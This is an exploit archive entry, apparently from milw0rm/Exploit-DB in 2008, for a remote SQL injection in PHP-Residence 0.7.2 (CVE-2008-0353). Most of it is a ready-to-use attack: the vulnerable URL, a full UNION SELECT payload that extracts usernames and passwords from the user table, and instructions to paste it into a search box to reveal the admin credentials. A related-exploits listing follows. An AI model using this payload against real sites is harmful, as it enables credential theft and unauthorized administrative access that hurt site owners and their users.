##################################################################################### #### PHPRESIDENCE 0.7.2 Remote Sql Injection #### #### BY IRCRASH #### ##################################################################################### # # #AUTHOR : IRCRASH (R3d.W0rm) # # # #Script Download : http://www.digitaldruid.net/download/php-residence_0.7.2.zip # # # #Vulnerability Page: http://site.com/path/visualizza_tabelle.php?id_sessione=&anno=2006&tipo_tabella=clienti # # #Search query : 99999'union/**/select/**/idutenti,nome_utente,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/utenti/* # # #Help : Go Vulnerability Page and Type Search Query in the textbox . Now you can # # see Admin Username And Password # # # # Our site : HTTP://IRCRASH.COM # # # ##################################################################################### # milw0rm.com [2008-01-16]
Related Exploits
Trying to match CVEs (1): CVE-2008-0353Trying to match OSVDBs (1): 40292
Trying to match setup file: ac38ddc1c9c58ba40617e3a5df18bc3d
Other Possible E-DB Search Terms: PHP-RESIDENCE 0.7.2, PHP-RESIDENCE
Date | D | V | Title | Author |
---|---|---|---|---|
2010-01-16 |
![]() |
PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusions | cr4wl3r |